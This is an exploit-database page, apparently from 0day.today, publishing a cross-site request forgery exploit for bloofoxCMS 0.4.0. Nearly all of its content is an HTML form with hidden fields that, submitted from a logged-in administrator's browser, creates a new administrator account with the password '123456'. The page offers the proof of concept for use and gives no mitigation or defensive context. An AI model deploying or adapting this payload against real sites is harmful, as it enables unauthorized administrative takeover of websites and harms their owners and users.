[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

bloofoxCMS 0.4.0 CSRF Vulnerability (Add Admin)

Author
AtT4CKxT3rR0r1ST
Risk
[
Security Risk Low
]
0day-ID
0day-ID-18255
Category
web applications
Date add
13-05-2012
Platform
php
bloofoxCMS 0.4.0 CSRF Vulnerability (Add Admin)
====================================================================
####################################################################
.:. Author         : AtT4CKxT3rR0r1ST  [F.Hack@w.cn]
.:. Script         : http://www.bloofox.com/
####################################################################
===[ Exploit ]===
<html>
<head>
<title>bloofoxCMS [Add Admin]</title>
</head>
<H2>CSRF Add Admin By AtT4CKxT3rR0r1ST</H2>
<form method="POST" name="form0" action="http://localhost/admin/index.php?mode=user&action=new">
<input type="hidden" name="username" value="Admin"/>
<input type="hidden" name="password" value="123456"/>
<input type="hidden" name="pwdconfirm" value="123456"/>
<input type="hidden" name="3" value="Admin"/>
<input type="hidden" name="blocked" value="0"/>
<input type="hidden" name="deleted" value="0"/>
<input type="hidden" name="status" value="1"/>
<input type="hidden" name="login_page" value="0"/>
<input type="hidden" name="send" value="Add User"/>
</form>
</body>
</html>
####################################################################



#  0day.today [2024-12-25]  #